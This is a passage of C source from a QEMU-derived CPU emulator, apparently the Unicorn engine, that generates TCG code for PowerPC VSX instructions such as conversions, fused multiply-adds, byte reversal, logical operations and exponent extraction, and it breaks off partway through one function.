GEN_VSX_HELPER_X2(xscvdpuxds, 0x10, 0x14, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xscvdpuxws, 0x10, 0x04, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xscvsxddp, 0x10, 0x17, 0, PPC2_VSX) GEN_VSX_HELPER_R2(xscvudqp, 0x04, 0x1A, 0x02, PPC2_ISA300) GEN_VSX_HELPER_X2(xscvuxddp, 0x10, 0x16, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xsrdpi, 0x12, 0x04, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xsrdpic, 0x16, 0x06, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xsrdpim, 0x12, 0x07, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xsrdpip, 0x12, 0x06, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xsrdpiz, 0x12, 0x05, 0, PPC2_VSX) GEN_VSX_HELPER_XT_XB_ENV(xsrsp, 0x12, 0x11, 0, PPC2_VSX207) GEN_VSX_HELPER_R2(xsrqpi, 0x05, 0x00, 0, PPC2_ISA300) GEN_VSX_HELPER_R2(xsrqpxp, 0x05, 0x01, 0, PPC2_ISA300) GEN_VSX_HELPER_R2(xssqrtqp, 0x04, 0x19, 0x1B, PPC2_ISA300) GEN_VSX_HELPER_R3(xssubqp, 0x04, 0x10, 0, PPC2_ISA300) GEN_VSX_HELPER_X3(xsaddsp, 0x00, 0x00, 0, PPC2_VSX207) GEN_VSX_HELPER_X3(xssubsp, 0x00, 0x01, 0, PPC2_VSX207) GEN_VSX_HELPER_X3(xsmulsp, 0x00, 0x02, 0, PPC2_VSX207) GEN_VSX_HELPER_X3(xsdivsp, 0x00, 0x03, 0, PPC2_VSX207) GEN_VSX_HELPER_X2(xsresp, 0x14, 0x01, 0, PPC2_VSX207) GEN_VSX_HELPER_X2(xssqrtsp, 0x16, 0x00, 0, PPC2_VSX207) GEN_VSX_HELPER_X2(xsrsqrtesp, 0x14, 0x00, 0, PPC2_VSX207) GEN_VSX_HELPER_X2(xscvsxdsp, 0x10, 0x13, 0, PPC2_VSX207) GEN_VSX_HELPER_X2(xscvuxdsp, 0x10, 0x12, 0, PPC2_VSX207) GEN_VSX_HELPER_X1(xststdcsp, 0x14, 0x12, 0, PPC2_ISA300) GEN_VSX_HELPER_2(xststdcdp, 0x14, 0x16, 0, PPC2_ISA300) GEN_VSX_HELPER_2(xststdcqp, 0x04, 0x16, 0, PPC2_ISA300) GEN_VSX_HELPER_X3(xvadddp, 0x00, 0x0C, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvsubdp, 0x00, 0x0D, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvmuldp, 0x00, 0x0E, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvdivdp, 0x00, 0x0F, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvredp, 0x14, 0x0D, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvsqrtdp, 0x16, 0x0C, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrsqrtedp, 0x14, 0x0C, 0, PPC2_VSX) GEN_VSX_HELPER_X2_AB(xvtdivdp, 0x14, 0x0F, 0, PPC2_VSX) GEN_VSX_HELPER_X1(xvtsqrtdp, 0x14, 0x0E, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvmaxdp, 0x00, 0x1C, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvmindp, 0x00, 0x1D, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvdpsp, 0x12, 0x18, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvdpsxds, 0x10, 0x1D, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvdpsxws, 0x10, 0x0D, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvdpuxds, 0x10, 0x1C, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvdpuxws, 0x10, 0x0C, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvsxddp, 0x10, 0x1F, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvuxddp, 0x10, 0x1E, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvsxwdp, 0x10, 0x0F, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvuxwdp, 0x10, 0x0E, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrdpi, 0x12, 0x0C, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrdpic, 0x16, 0x0E, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrdpim, 0x12, 0x0F, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrdpip, 0x12, 0x0E, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrdpiz, 0x12, 0x0D, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvaddsp, 0x00, 0x08, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvsubsp, 0x00, 0x09, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvmulsp, 0x00, 0x0A, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvdivsp, 0x00, 0x0B, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvresp, 0x14, 0x09, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvsqrtsp, 0x16, 0x08, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrsqrtesp, 0x14, 0x08, 0, PPC2_VSX) GEN_VSX_HELPER_X2_AB(xvtdivsp, 0x14, 0x0B, 0, PPC2_VSX) GEN_VSX_HELPER_X1(xvtsqrtsp, 0x14, 0x0A, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvmaxsp, 0x00, 0x18, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xvminsp, 0x00, 0x19, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvspdp, 0x12, 0x1C, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvhpsp, 0x16, 0x1D, 0x18, PPC2_ISA300) GEN_VSX_HELPER_X2(xvcvsphp, 0x16, 0x1D, 
0x19, PPC2_ISA300) GEN_VSX_HELPER_X2(xvcvspsxds, 0x10, 0x19, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvspsxws, 0x10, 0x09, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvspuxds, 0x10, 0x18, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvspuxws, 0x10, 0x08, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvsxdsp, 0x10, 0x1B, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvuxdsp, 0x10, 0x1A, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvsxwsp, 0x10, 0x0B, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvcvuxwsp, 0x10, 0x0A, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrspi, 0x12, 0x08, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrspic, 0x16, 0x0A, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrspim, 0x12, 0x0B, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrspip, 0x12, 0x0A, 0, PPC2_VSX) GEN_VSX_HELPER_X2(xvrspiz, 0x12, 0x09, 0, PPC2_VSX) GEN_VSX_HELPER_2(xvtstdcsp, 0x14, 0x1A, 0, PPC2_VSX) GEN_VSX_HELPER_2(xvtstdcdp, 0x14, 0x1E, 0, PPC2_VSX) GEN_VSX_HELPER_X3(xxperm, 0x08, 0x03, 0, PPC2_ISA300) GEN_VSX_HELPER_X3(xxpermr, 0x08, 0x07, 0, PPC2_ISA300) #define GEN_VSX_HELPER_VSX_MADD(name, op1, aop, mop, inval, type) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr xt, xa, b, c; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ xt = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); \ xa = gen_vsr_ptr(tcg_ctx, xA(ctx->opcode)); \ if (ctx->opcode & PPC_BIT32(25)) { \ /* \ * AxT + B \ */ \ b = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); \ c = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); \ } else { \ /* \ * AxB + T \ */ \ b = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); \ c = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); \ } \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, xt, xa, b, c); \ tcg_temp_free_ptr(tcg_ctx, xt); \ tcg_temp_free_ptr(tcg_ctx, xa); \ tcg_temp_free_ptr(tcg_ctx, b); \ tcg_temp_free_ptr(tcg_ctx, c); \ } GEN_VSX_HELPER_VSX_MADD(xsmadddp, 0x04, 0x04, 0x05, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xsmsubdp, 0x04, 0x06, 0x07, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xsnmadddp, 0x04, 0x14, 0x15, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xsnmsubdp, 0x04, 0x16, 0x17, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xsmaddsp, 0x04, 0x00, 0x01, 0, PPC2_VSX207) GEN_VSX_HELPER_VSX_MADD(xsmsubsp, 0x04, 0x02, 0x03, 0, PPC2_VSX207) GEN_VSX_HELPER_VSX_MADD(xsnmaddsp, 0x04, 0x10, 0x11, 0, PPC2_VSX207) GEN_VSX_HELPER_VSX_MADD(xsnmsubsp, 0x04, 0x12, 0x13, 0, PPC2_VSX207) GEN_VSX_HELPER_VSX_MADD(xvmadddp, 0x04, 0x0C, 0x0D, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xvmsubdp, 0x04, 0x0E, 0x0F, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xvnmadddp, 0x04, 0x1C, 0x1D, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xvnmsubdp, 0x04, 0x1E, 0x1F, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xvmaddsp, 0x04, 0x08, 0x09, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xvmsubsp, 0x04, 0x0A, 0x0B, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xvnmaddsp, 0x04, 0x18, 0x19, 0, PPC2_VSX) GEN_VSX_HELPER_VSX_MADD(xvnmsubsp, 0x04, 0x1A, 0x1B, 0, PPC2_VSX) static void gen_xxbrd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; TCGv_i64 xbl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); tcg_gen_bswap64_i64(tcg_ctx, xth, xbh); tcg_gen_bswap64_i64(tcg_ctx, xtl, xbl); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xbh); 
tcg_temp_free_i64(tcg_ctx, xbl); } static void gen_xxbrh(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; TCGv_i64 xbl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); gen_bswap16x8(tcg_ctx, xth, xtl, xbh, xbl); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } static void gen_xxbrq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; TCGv_i64 xbl; TCGv_i64 t0; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_bswap64_i64(tcg_ctx, t0, xbl); tcg_gen_bswap64_i64(tcg_ctx, xtl, xbh); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_gen_mov_i64(tcg_ctx, xth, t0); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } static void gen_xxbrw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; TCGv_i64 xbl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, xB(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xbl, xB(ctx->opcode)); gen_bswap32x4(tcg_ctx, xth, xtl, xbh, xbl); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xbl); } #define VSX_LOGICAL(name, vece, tcg_op) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ tcg_op(tcg_ctx, vece, vsr_full_offset(xT(ctx->opcode)), \ vsr_full_offset(xA(ctx->opcode)), \ vsr_full_offset(xB(ctx->opcode)), 16, 16); \ } VSX_LOGICAL(xxland, MO_64, tcg_gen_gvec_and) VSX_LOGICAL(xxlandc, MO_64, tcg_gen_gvec_andc) VSX_LOGICAL(xxlor, MO_64, tcg_gen_gvec_or) VSX_LOGICAL(xxlxor, MO_64, tcg_gen_gvec_xor) VSX_LOGICAL(xxlnor, MO_64, tcg_gen_gvec_nor) VSX_LOGICAL(xxleqv, MO_64, tcg_gen_gvec_eqv) VSX_LOGICAL(xxlnand, MO_64, tcg_gen_gvec_nand) VSX_LOGICAL(xxlorc, MO_64, tcg_gen_gvec_orc) #define VSX_XXMRG(name, high) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i64 a0, a1, b0, b1, tmp; \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ a0 = tcg_temp_new_i64(tcg_ctx); \ a1 = tcg_temp_new_i64(tcg_ctx); \ b0 = tcg_temp_new_i64(tcg_ctx); \ b1 = tcg_temp_new_i64(tcg_ctx); \ tmp = tcg_temp_new_i64(tcg_ctx); \ if (high) { \ get_cpu_vsrh(tcg_ctx, a0, xA(ctx->opcode)); \ 
get_cpu_vsrh(tcg_ctx, a1, xA(ctx->opcode)); \ get_cpu_vsrh(tcg_ctx, b0, xB(ctx->opcode)); \ get_cpu_vsrh(tcg_ctx, b1, xB(ctx->opcode)); \ } else { \ get_cpu_vsrl(tcg_ctx, a0, xA(ctx->opcode)); \ get_cpu_vsrl(tcg_ctx, a1, xA(ctx->opcode)); \ get_cpu_vsrl(tcg_ctx, b0, xB(ctx->opcode)); \ get_cpu_vsrl(tcg_ctx, b1, xB(ctx->opcode)); \ } \ tcg_gen_shri_i64(tcg_ctx, a0, a0, 32); \ tcg_gen_shri_i64(tcg_ctx, b0, b0, 32); \ tcg_gen_deposit_i64(tcg_ctx, tmp, b0, a0, 32, 32); \ set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), tmp); \ tcg_gen_deposit_i64(tcg_ctx, tmp, b1, a1, 32, 32); \ set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), tmp); \ tcg_temp_free_i64(tcg_ctx, a0); \ tcg_temp_free_i64(tcg_ctx, a1); \ tcg_temp_free_i64(tcg_ctx, b0); \ tcg_temp_free_i64(tcg_ctx, b1); \ tcg_temp_free_i64(tcg_ctx, tmp); \ } VSX_XXMRG(xxmrghw, 1) VSX_XXMRG(xxmrglw, 0) static void gen_xxsel(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rt = xT(ctx->opcode); int ra = xA(ctx->opcode); int rb = xB(ctx->opcode); int rc = xC(ctx->opcode); if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } tcg_gen_gvec_bitsel(tcg_ctx, MO_64, vsr_full_offset(rt), vsr_full_offset(rc), vsr_full_offset(rb), vsr_full_offset(ra), 16, 16); } static void gen_xxspltw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rt = xT(ctx->opcode); int rb = xB(ctx->opcode); int uim = UIM(ctx->opcode); int tofs, bofs; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } tofs = vsr_full_offset(rt); bofs = vsr_full_offset(rb); bofs += uim << MO_32; #ifndef HOST_WORDS_BIGENDIAN bofs ^= 8 | 4; #endif tcg_gen_gvec_dup_mem(tcg_ctx, MO_32, tofs, bofs, 16, 16); } #define pattern(x) (((x) & 0xff) * (~(uint64_t)0 / 0xff)) static void gen_xxspltib(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint8_t uim8 = IMM8(ctx->opcode); int rt = xT(ctx->opcode); if (rt < 32) { if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } } else { if (unlikely(!ctx->altivec_enabled)) { gen_exception(ctx, POWERPC_EXCP_VPU); return; } } tcg_gen_gvec_dup8i(tcg_ctx, vsr_full_offset(rt), 16, 16, uim8); } static void gen_xxsldwi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth, xtl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); switch (SHW(ctx->opcode)) { case 0: { get_cpu_vsrh(tcg_ctx, xth, xA(ctx->opcode)); get_cpu_vsrl(tcg_ctx, xtl, xA(ctx->opcode)); break; } case 1: { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xth, xA(ctx->opcode)); tcg_gen_shli_i64(tcg_ctx, xth, xth, 32); get_cpu_vsrl(tcg_ctx, t0, xA(ctx->opcode)); tcg_gen_shri_i64(tcg_ctx, t0, t0, 32); tcg_gen_or_i64(tcg_ctx, xth, xth, t0); get_cpu_vsrl(tcg_ctx, xtl, xA(ctx->opcode)); tcg_gen_shli_i64(tcg_ctx, xtl, xtl, 32); get_cpu_vsrh(tcg_ctx, t0, xB(ctx->opcode)); tcg_gen_shri_i64(tcg_ctx, t0, t0, 32); tcg_gen_or_i64(tcg_ctx, xtl, xtl, t0); tcg_temp_free_i64(tcg_ctx, t0); break; } case 2: { get_cpu_vsrl(tcg_ctx, xth, xA(ctx->opcode)); get_cpu_vsrh(tcg_ctx, xtl, xB(ctx->opcode)); break; } case 3: { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrl(tcg_ctx, xth, xA(ctx->opcode)); tcg_gen_shli_i64(tcg_ctx, xth, xth, 32); get_cpu_vsrh(tcg_ctx, t0, xB(ctx->opcode)); tcg_gen_shri_i64(tcg_ctx, t0, t0, 32); tcg_gen_or_i64(tcg_ctx, xth, xth, t0); get_cpu_vsrh(tcg_ctx, xtl, xB(ctx->opcode)); tcg_gen_shli_i64(tcg_ctx, xtl, xtl, 32); get_cpu_vsrl(tcg_ctx, t0, 
xB(ctx->opcode)); tcg_gen_shri_i64(tcg_ctx, t0, t0, 32); tcg_gen_or_i64(tcg_ctx, xtl, xtl, t0); tcg_temp_free_i64(tcg_ctx, t0); break; } } set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), xtl); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); } #define VSX_EXTRACT_INSERT(name) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_ptr xt, xb; \ TCGv_i32 t0; \ TCGv_i64 t1; \ uint8_t uimm = UIMM4(ctx->opcode); \ \ if (unlikely(!ctx->vsx_enabled)) { \ gen_exception(ctx, POWERPC_EXCP_VSXU); \ return; \ } \ xt = gen_vsr_ptr(tcg_ctx, xT(ctx->opcode)); \ xb = gen_vsr_ptr(tcg_ctx, xB(ctx->opcode)); \ t0 = tcg_temp_new_i32(tcg_ctx); \ t1 = tcg_temp_new_i64(tcg_ctx); \ /* \ * uimm > 15 out of bound and for \ * uimm > 12 handle as per hardware in helper \ */ \ if (uimm > 15) { \ tcg_gen_movi_i64(tcg_ctx, t1, 0); \ set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), t1); \ set_cpu_vsrl(tcg_ctx, xT(ctx->opcode), t1); \ return; \ } \ tcg_gen_movi_i32(tcg_ctx, t0, uimm); \ gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, xt, xb, t0); \ tcg_temp_free_ptr(tcg_ctx, xb); \ tcg_temp_free_ptr(tcg_ctx, xt); \ tcg_temp_free_i32(tcg_ctx, t0); \ tcg_temp_free_i64(tcg_ctx, t1); \ } VSX_EXTRACT_INSERT(xxextractuw) VSX_EXTRACT_INSERT(xxinsertw) #ifdef TARGET_PPC64 static void gen_xsxexpdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv rt = cpu_gpr[rD(ctx->opcode)]; TCGv_i64 t0; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } t0 = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, t0, xB(ctx->opcode)); tcg_gen_extract_i64(tcg_ctx, rt, t0, 52, 11); tcg_temp_free_i64(tcg_ctx, t0); } static void gen_xsxexpqp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, rB(ctx->opcode) + 32); tcg_gen_extract_i64(tcg_ctx, xth, xbh, 48, 15); set_cpu_vsrh(tcg_ctx, rD(ctx->opcode) + 32, xth); tcg_gen_movi_i64(tcg_ctx, xtl, 0); set_cpu_vsrl(tcg_ctx, rD(ctx->opcode) + 32, xtl); tcg_temp_free_i64(tcg_ctx, xbh); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); } static void gen_xsiexpdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv ra = cpu_gpr[rA(ctx->opcode)]; TCGv rb = cpu_gpr[rB(ctx->opcode)]; TCGv_i64 t0; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } t0 = tcg_temp_new_i64(tcg_ctx); xth = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, xth, ra, 0x800FFFFFFFFFFFFF); tcg_gen_andi_i64(tcg_ctx, t0, rb, 0x7FF); tcg_gen_shli_i64(tcg_ctx, t0, t0, 52); tcg_gen_or_i64(tcg_ctx, xth, xth, t0); set_cpu_vsrh(tcg_ctx, xT(ctx->opcode), xth); /* dword[1] is undefined */ tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, xth); } static void gen_xsiexpqp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xah; TCGv_i64 xal; TCGv_i64 xbh; TCGv_i64 t0; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xah = tcg_temp_new_i64(tcg_ctx); xal = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xah, rA(ctx->opcode) + 32); get_cpu_vsrl(tcg_ctx, xal, rA(ctx->opcode) + 32); xbh = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, 
rB(ctx->opcode) + 32); t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, xth, xah, 0x8000FFFFFFFFFFFF); tcg_gen_andi_i64(tcg_ctx, t0, xbh, 0x7FFF); tcg_gen_shli_i64(tcg_ctx, t0, t0, 48); tcg_gen_or_i64(tcg_ctx, xth, xth, t0); set_cpu_vsrh(tcg_ctx, rD(ctx->opcode) + 32, xth); tcg_gen_mov_i64(tcg_ctx, xtl, xal); set_cpu_vsrl(tcg_ctx, rD(ctx->opcode) + 32, xtl); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, xth); tcg_temp_free_i64(tcg_ctx, xtl); tcg_temp_free_i64(tcg_ctx, xah); tcg_temp_free_i64(tcg_ctx, xal); tcg_temp_free_i64(tcg_ctx, xbh); } static void gen_xsxsigdp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv rt = cpu_gpr[rD(ctx->opcode)]; TCGv_i64 t0, t1, zr, nan, exp; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } exp = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); zr = tcg_const_i64(tcg_ctx, 0); nan = tcg_const_i64(tcg_ctx, 2047); get_cpu_vsrh(tcg_ctx, t1, xB(ctx->opcode)); tcg_gen_extract_i64(tcg_ctx, exp, t1, 52, 11); tcg_gen_movi_i64(tcg_ctx, t0, 0x0010000000000000); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, exp, zr, zr, t0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t0, exp, nan, zr, t0); get_cpu_vsrh(tcg_ctx, t1, xB(ctx->opcode)); tcg_gen_deposit_i64(tcg_ctx, rt, t0, t1, 0, 52); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, exp); tcg_temp_free_i64(tcg_ctx, zr); tcg_temp_free_i64(tcg_ctx, nan); } static void gen_xsxsigqp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0, zr, nan, exp; TCGv_i64 xth; TCGv_i64 xtl; TCGv_i64 xbh; TCGv_i64 xbl; if (unlikely(!ctx->vsx_enabled)) { gen_exception(ctx, POWERPC_EXCP_VSXU); return; } xth = tcg_temp_new_i64(tcg_ctx); xtl = tcg_temp_new_i64(tcg_ctx); xbh = tcg_temp_new_i64(tcg_ctx); xbl = tcg_temp_new_i64(tcg_ctx); get_cpu_vsrh(tcg_ctx, xbh, rB(ctx->opcode) + 32); get_cpu_vsrl(tcg_ctx, xbl, rB(ctx->opcode) + 32); exp = tcg_temp_new_i64(tcg_ctx); t0 = tcg_temp_new_i64(tcg_ctx); zr = tcg_const_i64(tcg_ctx, 0); nan = tcg_const_i64(tcg_ctx, 32767); tcg_gen_extract_i64(tcg_ctx, exp, xbh, 48, 15); tcg_gen_movi_i64(tcg_ctx, t0, 0x0001000000000000); 